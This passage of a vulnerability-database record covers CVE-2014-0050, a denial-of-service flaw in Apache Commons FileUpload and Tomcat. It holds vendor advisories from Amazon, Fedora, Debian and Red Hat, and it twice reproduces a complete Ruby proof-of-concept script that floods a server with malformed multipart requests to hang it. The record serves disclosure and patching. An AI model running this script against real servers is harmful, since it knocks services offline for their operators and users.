"cvelist": ["CVE-2014-0050"], "modified": "2014-02-13T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61443", "id": "SSV:61443", "sourceData": "\n #################################################################################\r\n# CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat Denial-of-Service #\r\n# #\r\n# Author: Oren Hafif, Trustwave SpiderLabs Research #\r\n# This is a Proof of Concept code that was created for the sole purpose #\r\n# of assisting system administrators in evaluating whether their applications #\r\n# are vulnerable to this issue or not #\r\n# #\r\n# Please use responsibly. #\r\n#################################################################################\r\n \r\n \r\nrequire 'net/http'\r\nrequire 'net/https'\r\nrequire 'optparse'\r\nrequire 'openssl'\r\n \r\n \r\noptions = {}\r\n \r\nopt_parser = OptionParser.new do |opt|\r\n opt.banner = "Usage: ./CVE-2014-0050.rb [OPTIONS]"\r\n opt.separator ""\r\n opt.separator "Options"\r\n opt.on("-u","--url URL","The url of the Servlet/JSP to test for Denial of Service") do |url|\r\n options[:url] = url\r\n end\r\n \r\n opt.on("-n","--number_of_requests NUMBER_OF_REQUSETS","The number of requests to send to the server. The default value is 10") do |number_of_requests|\r\n options[:number_of_requests] = number_of_requests\r\n end\r\n \r\n opt.on("-h","--help","help") do\r\n puts ""\r\n puts "#################################################################################"\r\n puts "# CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat Denial-of-Service #"\r\n puts "# #"\r\n puts "# Author: Oren Hafif, Trustwave SpiderLabs Research #"\r\n puts "# This is a Proof of Concept code that was created for the sole purpose #"\r\n puts "# of assisting system administrators in evaluating whether or not #"\r\n puts "# their applications are vulnerable to this issue. #"\r\n puts "# #"\r\n puts "# Please use responsibly. #"\r\n puts "#################################################################################"\r\n puts ""\r\n puts opt_parser\r\n puts ""\r\n \r\n exit\r\n end\r\nend\r\n \r\nopt_parser.parse!\r\n \r\n \r\nuri = ""\r\nbegin\r\n uri = URI.parse(options[:url])\r\nrescue Exception => e\r\n puts ""\r\n puts "ERROR: Invalid URL was entered #{options[:url]}"\r\n puts ""\r\n puts opt_parser\r\n exit\r\nend\r\n \r\nnumber_of_requests = 10;\r\nif(options[:number_of_requests] != nil)\r\n begin\r\n number_of_requests = Integer( options[:number_of_requests] )\r\n throw Exception.new if number_of_requests <= 0\r\n rescue Exception => e\r\n puts e\r\n puts ""\r\n puts "ERROR: Invalid NUMBER_OF_REQUSETS was entered #{options[:number_of_requests]}"\r\n puts ""\r\n puts opt_parser\r\n exit\r\n end\r\nend\r\n \r\n#uri = URI.parse(uri)\r\n \r\n \r\nputs ""\r\nputs "WARNING: Usage of this tool for attack purposes is forbidden - press Ctrl-C now to abort..."\r\ni=10\r\ni.times { print "#{i.to_s}...";sleep 1; i-=1;}\r\nputs ""\r\n \r\n \r\nnumber_of_requests.times do\r\n begin\r\n puts "Request Launched"\r\n https = Net::HTTP.new(uri.host,uri.port)\r\n https.use_ssl = uri.scheme=="https"\r\n https.verify_mode = OpenSSL::SSL::VERIFY_NONE\r\n req = Net::HTTP::Post.new(uri.path)\r\n req.add_field("Content-Type","multipart/form-data; boundary=#{"a"*4092}")\r\n req.add_field("lf-None-Match","59e532f501ac13174dd9c488f897ee75")\r\n req.body = "b"*4097\r\n https.read_timeout = 1\r\n res = https.request(req)\r\n rescue Timeout::Error=>e\r\n puts "Timeout - continuing DoS..."\r\n rescue Exception=>e\r\n puts e.inspect\r\n end\r\nend\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-61443", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "amazon": [{"lastseen": "2020-11-10T12:34:47", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0050"], "description": "**Issue Overview:**\n\nMultipartStream.java in Apache Commons FileUpload before 1.3.1, as used in Apache Tomcat, JBoss Web, and other products, allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a crafted Content-Type header that bypasses a loop's intended exit conditions. \n\n \n**Affected Packages:** \n\n\ntomcat7\n\n \n**Issue Correction:** \nRun _yum update tomcat7_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n noarch: \n tomcat7-docs-webapp-7.0.47-1.38.amzn1.noarch \n tomcat7-7.0.47-1.38.amzn1.noarch \n tomcat7-lib-7.0.47-1.38.amzn1.noarch \n tomcat7-webapps-7.0.47-1.38.amzn1.noarch \n tomcat7-el-2.2-api-7.0.47-1.38.amzn1.noarch \n tomcat7-javadoc-7.0.47-1.38.amzn1.noarch \n tomcat7-jsp-2.2-api-7.0.47-1.38.amzn1.noarch \n tomcat7-admin-webapps-7.0.47-1.38.amzn1.noarch \n tomcat7-servlet-3.0-api-7.0.47-1.38.amzn1.noarch \n \n src: \n tomcat7-7.0.47-1.38.amzn1.src \n \n \n", "edition": 4, "modified": "2014-03-24T23:36:00", "published": "2014-03-24T23:36:00", "id": "ALAS-2014-312", "href": "https://alas.aws.amazon.com/ALAS-2014-312.html", "title": "Medium: tomcat7", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-10T12:36:26", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3544", "CVE-2013-4322", "CVE-2014-0050", "CVE-2013-4286"], "description": "**Issue Overview:**\n\nIt was found that when Tomcat processed a series of HTTP requests in which at least one request contained either multiple content-length headers, or one content-length header with a chunked transfer-encoding header, Tomcat would incorrectly handle the request. A remote attacker could use this flaw to poison a web cache, perform cross-site scripting (XSS) attacks, or obtain sensitive information from other requests. ([CVE-2013-4286 __](<https://access.redhat.com/security/cve/CVE-2013-4286>))\n\nIt was discovered that the fix for [CVE-2012-3544 __](<https://access.redhat.com/security/cve/CVE-2012-3544>) did not properly resolve a denial of service flaw in the way Tomcat processed chunk extensions and trailing headers in chunked requests. A remote attacker could use this flaw to send an excessively long request that, when processed by Tomcat, could consume network bandwidth, CPU, and memory on the Tomcat server. Note that chunked transfer encoding is enabled by default. ([CVE-2013-4322 __](<https://access.redhat.com/security/cve/CVE-2013-4322>))\n\nA denial of service flaw was found in the way Apache Commons FileUpload handled small-sized buffers used by MultipartStream. A remote attacker could use this flaw to create a malformed Content-Type header for a multipart request, causing JBoss Web to enter an infinite loop when processing such an incoming request. ([CVE-2014-0050 __](<https://access.redhat.com/security/cve/CVE-2014-0050>))\n\n \n**Affected Packages:** \n\n\ntomcat6\n\n \n**Issue Correction:** \nRun _yum update tomcat6_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n noarch: \n tomcat6-servlet-2.5-api-6.0.39-1.4.amzn1.noarch \n tomcat6-lib-6.0.39-1.4.amzn1.noarch \n tomcat6-webapps-6.0.39-1.4.amzn1.noarch \n tomcat6-admin-webapps-6.0.39-1.4.amzn1.noarch \n tomcat6-6.0.39-1.4.amzn1.noarch \n tomcat6-javadoc-6.0.39-1.4.amzn1.noarch \n tomcat6-docs-webapp-6.0.39-1.4.amzn1.noarch \n tomcat6-jsp-2.1-api-6.0.39-1.4.amzn1.noarch \n tomcat6-el-2.1-api-6.0.39-1.4.amzn1.noarch \n \n src: \n tomcat6-6.0.39-1.4.amzn1.src \n \n \n", "edition": 4, "modified": "2014-05-21T10:45:00", "published": "2014-05-21T10:45:00", "id": "ALAS-2014-344", "href": "https://alas.aws.amazon.com/ALAS-2014-344.html", "title": "Medium: tomcat6", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0050"], "description": "The javax.servlet package lacks support for rfc 1867, html file upload. This package provides a simple to use api for working with such data. The scope of this package is to create a package of Java utility classes to read multipart/form-data within a javax.servlet.http.HttpServletRequest ", "modified": "2014-02-17T21:06:10", "published": "2014-02-17T21:06:10", "id": "FEDORA:EA6192175F", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: apache-commons-fileupload-1.3-5.fc20", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0050"], "description": "The javax.servlet package lacks support for rfc 1867, html file upload. This package provides a simple to use api for working with such data. The scope of this package is to create a package of Java utility classes to read multipart/form-data within a javax.servlet.http.HttpServletRequest ", "modified": "2014-02-17T21:07:04", "published": "2014-02-17T21:07:04", "id": "FEDORA:58AC321FC4", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: apache-commons-fileupload-1.3-5.fc19", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2020-11-11T13:29:47", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0050"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2856-1 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nFebruary 07, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : libcommons-fileupload-java\nVulnerability : denial of service\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2014-0050\n\nIt was discovered that the Apache Commons FileUpload package for Java\ncould enter an infinite loop while processing a multipart request with\na crafted Content-Type, resulting in a denial-of-service condition.\n\nFor the oldstable distribution (squeeze), this problem has been fixed in\nversion 1.2.2-1+deb6u2.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 1.2.2-1+deb7u2.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.3.1-1.\n\nWe recommend that you upgrade your libcommons-fileupload-java packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 4, "modified": "2014-02-07T22:59:26", "published": "2014-02-07T22:59:26", "id": "DEBIAN:DSA-2856-1:D2DA2", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2014/msg00026.html", "title": "[SECURITY] [DSA 2856-1] libcommons-fileupload-java security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:03", "description": "\nApache Commons FileUpload and Apache Tomcat - Denial of Service", "edition": 1, "published": "2014-02-12T00:00:00", "title": "Apache Commons FileUpload and Apache Tomcat - Denial of Service", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0050"], "modified": "2014-02-12T00:00:00", "id": "EXPLOITPACK:EB000848EE6583FA3B8F33FA4CDD34C0", "href": "", "sourceData": "#################################################################################\n# CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat Denial-of-Service\t#\n# \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\n# Author: Oren Hafif, Trustwave SpiderLabs Research\t\t\t\t\t\t\t\t#\n# This is a Proof of Concept code that was created for the sole purpose \t\t#\n# of assisting system administrators in evaluating whether their applications \t#\n# are vulnerable to this issue or not\t\t\t\t\t\t\t\t\t\t\t#\n# \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\n# Please use responsibly.\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\n#################################################################################\n\n\nrequire 'net/http'\nrequire 'net/https'\nrequire 'optparse'\nrequire 'openssl'\n\n\noptions = {}\n\nopt_parser = OptionParser.new do |opt|\n opt.banner = \"Usage: ./CVE-2014-0050.rb [OPTIONS]\"\n opt.separator \"\"\n opt.separator \"Options\"\n opt.on(\"-u\",\"--url URL\",\"The url of the Servlet/JSP to test for Denial of Service\") do |url|\n options[:url] = url\n end\n\n opt.on(\"-n\",\"--number_of_requests NUMBER_OF_REQUSETS\",\"The number of requests to send to the server. The default value is 10\") do |number_of_requests|\n options[:number_of_requests] = number_of_requests\n end\n\n opt.on(\"-h\",\"--help\",\"help\") do\n \tputs \"\"\n puts \"#################################################################################\"\n\tputs \"# CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat Denial-of-Service #\"\n\tputs \"# #\"\n\tputs \"# Author: Oren Hafif, Trustwave SpiderLabs Research #\"\n\tputs \"# This is a Proof of Concept code that was created for the sole purpose #\"\n\tputs \"# of assisting system administrators in evaluating whether or not #\"\n\tputs \"# their applications are vulnerable to this issue. #\"\n\tputs \"# #\"\n\tputs \"# Please use responsibly. #\"\n\tputs \"#################################################################################\"\n puts \"\"\n puts opt_parser\n puts \"\"\n \n\texit\n end\nend\n\nopt_parser.parse!\n\n\nuri = \"\"\nbegin\n\turi = URI.parse(options[:url])\nrescue Exception => e\n\tputs \"\"\n\tputs \"ERROR: Invalid URL was entered #{options[:url]}\"\n\tputs \"\"\n puts opt_parser\n exit\nend\n\nnumber_of_requests = 10;\nif(options[:number_of_requests] != nil)\n\tbegin\n\t\tnumber_of_requests = Integer( options[:number_of_requests] )\n\t\tthrow Exception.new if number_of_requests <= 0 \n\trescue Exception => e\n\t\tputs e\n\t\tputs \"\"\n\t\tputs \"ERROR: Invalid NUMBER_OF_REQUSETS was entered #{options[:number_of_requests]}\"\n\t\tputs \"\"\n\t puts opt_parser\n\t exit\n\tend\nend\n\n#uri = URI.parse(uri)\n\n\nputs \"\"\nputs \"WARNING: Usage of this tool for attack purposes is forbidden - press Ctrl-C now to abort...\"\ni=10\ni.times { print \"#{i.to_s}...\";sleep 1; i-=1;}\nputs \"\"\n\n\nnumber_of_requests.times do \n\tbegin\n\tputs \"Request Launched\"\n\thttps = Net::HTTP.new(uri.host,uri.port)\n\thttps.use_ssl = uri.scheme==\"https\"\n\thttps.verify_mode = OpenSSL::SSL::VERIFY_NONE\n\treq = Net::HTTP::Post.new(uri.path)\n\treq.add_field(\"Content-Type\",\"multipart/form-data; boundary=#{\"a\"*4092}\")\n\treq.add_field(\"lf-None-Match\",\"59e532f501ac13174dd9c488f897ee75\")\n\treq.body = \"b\"*4097\n\thttps.read_timeout = 1 \n\tres = https.request(req)\n\trescue Timeout::Error=>e\n\t\tputs \"Timeout - continuing DoS...\"\n\trescue Exception=>e\n\t\tputs e.inspect\n\tend\nend", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2019-05-29T14:34:20", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0050"], "description": "Red Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7.\n\nA denial of service flaw was found in the way Apache Commons FileUpload,\nwhich is embedded in the JBoss Web component of JBoss EAP, handled\nsmall-sized buffers used by MultipartStream. A remote attacker could use\nthis flaw to create a malformed Content-Type header for a multipart\nrequest, causing JBoss Web to enter an infinite loop when processing such\nan incoming request. (CVE-2014-0050)\n\nAll users of Red Hat JBoss Enterprise Application Platform 6.2.1 as\nprovided from the Red Hat Customer Portal are advised to apply this update.\nThe JBoss server process must be restarted for the update to take effect.", "modified": "2019-02-20T17:13:40", "published": "2014-03-05T23:50:05", "id": "RHSA-2014:0252", "href": "https://access.redhat.com/errata/RHSA-2014:0252", "type": "redhat", "title": "(RHSA-2014:0252) Moderate: Red Hat JBoss Enterprise Application Platform 6.2.1 security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:44:52", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0050"], "description": "Red Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7.\n\nA denial of service flaw was found in the way Apache Commons FileUpload,\nwhich is embedded in the JBoss Web component of JBoss EAP, handled\nsmall-sized buffers used by MultipartStream. A remote attacker could use\nthis flaw to create a malformed Content-Type header for a multipart\nrequest, causing JBoss Web to enter an infinite loop when processing such\nan incoming request. (CVE-2014-0050)\n\nWarning: Before applying this update, back up your existing Red Hat JBoss\nEnterprise Application Platform installation and deployed applications.\n\nAll users of Red Hat JBoss Enterprise Application Platform 6.2.1 on Red Hat\nEnterprise Linux 5 and 6 are advised to upgrade to these updated packages.\nThe JBoss server process must be restarted for the update to take effect.\n", "modified": "2018-06-07T02:39:08", "published": "2014-03-05T05:00:00", "id": "RHSA-2014:0253", "href": "https://access.redhat.com/errata/RHSA-2014:0253", "type": "redhat", "title": "(RHSA-2014:0253) Moderate: Red Hat JBoss Enterprise Application Platform 6.2.1 security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T14:34:12", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4286", "CVE-2014-0002", "CVE-2014-0003", "CVE-2014-0050"], "description": "Red Hat JBoss Fuse Service Works is the next-generation ESB and business\nprocess automation infrastructure. Red Hat JBoss Fuse Service Works allows\nIT to leverage existing (MoM and EAI), modern (SOA and BPM-Rules), and\nfuture (EDA and CEP) integration methodologies to dramatically improve\nbusiness process execution speed and quality.\n\nThis roll up patch serves as a cumulative upgrade for Red Hat JBoss Fuse\nService Works 6.0.0. It includes various bug fixes, which are listed in the\nREADME file included with the patch files.\n\nThe following security issues are also fixed with this release:\n\nIt was found that the Apache Camel XSLT component allowed XSL stylesheets\nto call external Java methods. A remote attacker able to submit messages to\na Camel route could use this flaw to perform arbitrary remote code\nexecution in the context of the Camel server process. (CVE-2014-0003)\n\nIt was found that when JBoss Web processed a series of HTTP requests in\nwhich at least one request contained either multiple content-length\nheaders, or one content-length header with a chunked transfer-encoding\nheader, JBoss Web would incorrectly handle the request. A remote attacker\ncould use this flaw to poison a web cache, perform cross-site scripting\n(XSS) attacks, or obtain sensitive information from other requests.\n(CVE-2013-4286)\n\nIt was found that the Apache Camel XSLT component would resolve entities in\nXML messages when transforming them using an XSLT route. A remote attacker\nable to submit messages to an XSLT Camel route could use this flaw to read\nfiles accessible to the user running the application server and,\npotentially, perform other more advanced XML External Entity (XXE) attacks.\n(CVE-2014-0002)\n\nA denial of service flaw was found in the way Apache Commons FileUpload,\nwhich is embedded in the JBoss Web component of JBoss EAP, handled\nsmall-sized buffers used by MultipartStream. A remote attacker could use\nthis flaw to create a malformed Content-Type header for a multipart\nrequest, causing JBoss Web to enter an infinite loop when processing such\nan incoming request. (CVE-2014-0050)\n\nThe CVE-2014-0002 and CVE-2014-0003 issues were discovered by David Jorm of\nthe Red Hat Security Response Team.\n\nAll users of Red Hat JBoss Fuse Service Works 6.0.0 as provided from the\nRed Hat Customer Portal are advised to apply this roll up patch.", "modified": "2019-02-20T17:14:43", "published": "2014-04-30T22:58:30", "id": "RHSA-2014:0459", "href": "https://access.redhat.com/errata/RHSA-2014:0459", "type": "redhat", "title": "(RHSA-2014:0459) Important: Red Hat JBoss Fuse Service Works 6.0.0 security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T14:34:58", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3544", "CVE-2013-4286", "CVE-2013-4322", "CVE-2014-0050"], "description": "Red Hat JBoss Web Server is a fully integrated and certified set of\ncomponents for hosting Java web applications. It is comprised of the Apache\nHTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector\n(mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat\nNative library.\n\nIt was found that when Tomcat processed a series of HTTP requests in which\nat least one request contained either multiple content-length headers, or\none content-length header with a chunked transfer-encoding header, Tomcat\nwould incorrectly handle the request. A remote attacker could use this flaw\nto poison a web cache, perform cross-site scripting (XSS) attacks, or\nobtain sensitive information from other requests. (CVE-2013-4286)\n\nIt was discovered that the fix for CVE-2012-3544 did not properly resolve a\ndenial of service flaw in the way Tomcat processed chunk extensions and\ntrailing headers in chunked requests. A remote attacker could use this flaw\nto send an excessively long request that, when processed by Tomcat, could\nconsume network bandwidth, CPU, and memory on the Tomcat server. Note that\nchunked transfer encoding is enabled by default. (CVE-2013-4322)\n\nA denial of service flaw was found in the way Apache Commons FileUpload,\nwhich is embedded in Tomcat, handled small-sized buffers used by\nMultipartStream. A remote attacker could use this flaw to create a\nmalformed Content-Type header for a multipart request, causing Tomcat to\nenter an infinite loop when processing such an incoming request.\n(CVE-2014-0050)\n\nAll users of Red Hat JBoss Web Server 2.0.1 as provided from the Red Hat\nCustomer Portal are advised to apply this update. The Red Hat JBoss Web\nServer process must be restarted for the update to take effect.", "modified": "2019-02-20T17:15:07", "published": "2014-05-21T19:31:56", "id": "RHSA-2014:0527", "href": "https://access.redhat.com/errata/RHSA-2014:0527", "type": "redhat", "title": "(RHSA-2014:0527) Moderate: Red Hat JBoss Web Server 2.0.1 tomcat7 security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:45:05", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3544", "CVE-2013-4286", "CVE-2013-4322", "CVE-2014-0050"], "description": "Apache Tomcat is a servlet container for the Java Servlet and JavaServer\nPages (JSP) technologies.\n\nIt was found that when Tomcat processed a series of HTTP requests in which\nat least one request contained either multiple content-length headers, or\none content-length header with a chunked transfer-encoding header, Tomcat\nwould incorrectly handle the request. A remote attacker could use this flaw\nto poison a web cache, perform cross-site scripting (XSS) attacks, or\nobtain sensitive information from other requests. (CVE-2013-4286)\n\nIt was discovered that the fix for CVE-2012-3544 did not properly resolve a\ndenial of service flaw in the way Tomcat processed chunk extensions and\ntrailing headers in chunked requests. A remote attacker could use this flaw\nto send an excessively long request that, when processed by Tomcat, could\nconsume network bandwidth, CPU, and memory on the Tomcat server. Note that\nchunked transfer encoding is enabled by default. (CVE-2013-4322)\n\nA denial of service flaw was found in the way Apache Commons FileUpload\nhandled small-sized buffers used by MultipartStream. A remote attacker\ncould use this flaw to create a malformed Content-Type header for a\nmultipart request, causing JBoss Web to enter an infinite loop when\nprocessing such an incoming request. (CVE-2014-0050)\n\nAll Tomcat users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. Tomcat must be\nrestarted for this update to take effect.\n", "modified": "2018-06-06T20:24:30", "published": "2014-04-23T04:00:00", "id": "RHSA-2014:0429", "href": "https://access.redhat.com/errata/RHSA-2014:0429", "type": "redhat", "title": "(RHSA-2014:0429) Moderate: tomcat6 security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:46:13", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3544", "CVE-2013-4286", "CVE-2013-4322", "CVE-2014-0050"], "description": "Red Hat JBoss Web Server is a fully integrated and certified set of\ncomponents for hosting Java web applications. It is comprised of the Apache\nHTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector\n(mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat\nNative library.\n\nIt was found that when Tomcat processed a series of HTTP requests in which\nat least one request contained either multiple content-length headers, or\none content-length header with a chunked transfer-encoding header, Tomcat\nwould incorrectly handle the request. A remote attacker could use this flaw\nto poison a web cache, perform cross-site scripting (XSS) attacks, or\nobtain sensitive information from other requests. (CVE-2013-4286)\n\nIt was discovered that the fix for CVE-2012-3544 did not properly resolve a\ndenial of service flaw in the way Tomcat processed chunk extensions and\ntrailing headers in chunked requests. A remote attacker could use this flaw\nto send an excessively long request that, when processed by Tomcat, could\nconsume network bandwidth, CPU, and memory on the Tomcat server. Note that\nchunked transfer encoding is enabled by default. (CVE-2013-4322)\n\nA denial of service flaw was found in the way Apache Commons FileUpload,\nwhich is embedded in Tomcat, handled small-sized buffers used by\nMultipartStream. A remote attacker could use this flaw to create a\nmalformed Content-Type header for a multipart request, causing Tomcat to\nenter an infinite loop when processing such an incoming request.\n(CVE-2014-0050)\n\nAll users of Red Hat JBoss Web Server 2.0.1 are advised to upgrade to these\nupdated tomcat7 packages, which contain backported patches to correct these\nissues. The Red Hat JBoss Web Server process must be restarted for the\nupdate to take effect.", "modified": "2018-08-09T19:46:59", "published": "2014-05-21T19:09:06", "id": "RHSA-2014:0526", "href": "https://access.redhat.com/errata/RHSA-2014:0526", "type": "redhat", "title": "(RHSA-2014:0526) Moderate: Red Hat JBoss Web Server 2.0.1 tomcat7 security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T14:33:39", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3544", "CVE-2013-4286", "CVE-2013-4322", "CVE-2014-0033", "CVE-2014-0050"], "description": "Red Hat JBoss Web Server is a fully integrated and certified set of\ncomponents for hosting Java web applications. It is comprised of the Apache\nHTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector\n(mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat\nNative library.\n\nIt was found that when Tomcat processed a series of HTTP requests in which\nat least one request contained either multiple content-length headers, or\none content-length header with a chunked transfer-encoding header, Tomcat\nwould incorrectly handle the request. A remote attacker could use this flaw\nto poison a web cache, perform cross-site scripting (XSS) attacks, or\nobtain sensitive information from other requests. (CVE-2013-4286)\n\nIt was discovered that the fix for CVE-2012-3544 did not properly resolve a\ndenial of service flaw in the way Tomcat processed chunk extensions and\ntrailing headers in chunked requests. A remote attacker could use this flaw\nto send an excessively long request that, when processed by Tomcat, could\nconsume network bandwidth, CPU, and memory on the Tomcat server. Note that\nchunked transfer encoding is enabled by default. (CVE-2013-4322)\n\nIt was found that previous fixes in Tomcat 6 to path parameter handling\nintroduced a regression that caused Tomcat to not properly disable URL\nrewriting to track session IDs when the disableURLRewriting option was\nenabled. A man-in-the-middle attacker could potentially use this flaw to\nhijack a user's session. (CVE-2014-0033)\n\nA denial of service flaw was found in the way Apache Commons FileUpload,\nwhich is embedded in Tomcat, handled small-sized buffers used by\nMultipartStream. A remote attacker could use this flaw to create a\nmalformed Content-Type header for a multipart request, causing Tomcat to\nenter an infinite loop when processing such an incoming request.\n(CVE-2014-0050)\n\nAll users of Red Hat JBoss Web Server 2.0.1 as provided from the Red Hat\nCustomer Portal are advised to apply this update. The Red Hat JBoss Web\nServer process must be restarted for the update to take effect.", "modified": "2019-02-20T17:15:04", "published": "2014-05-21T19:32:03", "id": "RHSA-2014:0528", "href": "https://access.redhat.com/errata/RHSA-2014:0528", "type": "redhat", "title": "(RHSA-2014:0528) Moderate: Red Hat JBoss Web Server 2.0.1 tomcat6 security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:45:49", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4322", "CVE-2014-0050", "CVE-2014-0075", "CVE-2014-0096", "CVE-2014-0099"], "description": "Apache Tomcat is a servlet container for the Java Servlet and JavaServer\nPages (JSP) technologies.\n\nIt was discovered that Apache Tomcat did not limit the length of chunk\nsizes when using chunked transfer encoding. A remote attacker could use\nthis flaw to perform a denial of service attack against Tomcat by streaming\nan unlimited quantity of data, leading to excessive consumption of server\nresources. (CVE-2014-0075)\n\nIt was found that Apache Tomcat did not check for overflowing values when\nparsing request content length headers. A remote attacker could use this\nflaw to perform an HTTP request smuggling attack on a Tomcat server located\nbehind a reverse proxy that processed the content length header correctly.\n(CVE-2014-0099)\n\nIt was found that the org.apache.catalina.servlets.DefaultServlet\nimplementation in Apache Tomcat allowed the definition of XML External\nEntities (XXEs) in provided XSLTs. A malicious application could use this\nto circumvent intended security restrictions to disclose sensitive\ninformation. (CVE-2014-0096)\n\nThe CVE-2014-0075 issue was discovered by David Jorm of Red Hat Product\nSecurity.\n\nThis update also fixes the following bugs:\n\n* The patch that resolved the CVE-2014-0050 issue contained redundant code.\nThis update removes the redundant code. (BZ#1094528)\n\n* The patch that resolved the CVE-2013-4322 issue contained an invalid\ncheck that triggered a java.io.EOFException while reading trailer headers\nfor chunked requests. This update fixes the check and the aforementioned\nexception is no longer triggered in the described scenario. (BZ#1095602)\n\nAll Tomcat 6 users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. Tomcat must be\nrestarted for this update to take effect.\n", "modified": "2018-06-06T20:24:29", "published": "2014-07-09T04:00:00", "id": "RHSA-2014:0865", "href": "https://access.redhat.com/errata/RHSA-2014:0865", "type": "redhat", "title": "(RHSA-2014:0865) Moderate: tomcat6 security and bug fix update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:45:39", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3544", "CVE-2013-4286", "CVE-2013-4322", "CVE-2014-0033", "CVE-2014-0050"], "description": "Red Hat JBoss Web Server is a fully integrated and certified set of\ncomponents for hosting Java web applications. It is comprised of the Apache\nHTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector\n(mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat\nNative library.\n\nIt was found that when Tomcat processed a series of HTTP requests in which\nat least one request contained either multiple content-length headers, or\none content-length header with a chunked transfer-encoding header, Tomcat\nwould incorrectly handle the request. A remote attacker could use this flaw\nto poison a web cache, perform cross-site scripting (XSS) attacks, or\nobtain sensitive information from other requests. (CVE-2013-4286)\n\nIt was discovered that the fix for CVE-2012-3544 did not properly resolve a\ndenial of service flaw in the way Tomcat processed chunk extensions and\ntrailing headers in chunked requests. A remote attacker could use this flaw\nto send an excessively long request that, when processed by Tomcat, could\nconsume network bandwidth, CPU, and memory on the Tomcat server. Note that\nchunked transfer encoding is enabled by default. (CVE-2013-4322)\n\nIt was found that previous fixes in Tomcat 6 to path parameter handling\nintroduced a regression that caused Tomcat to not properly disable URL\nrewriting to track session IDs when the disableURLRewriting option was\nenabled. A man-in-the-middle attacker could potentially use this flaw to\nhijack a user's session. (CVE-2014-0033)\n\nA denial of service flaw was found in the way Apache Commons 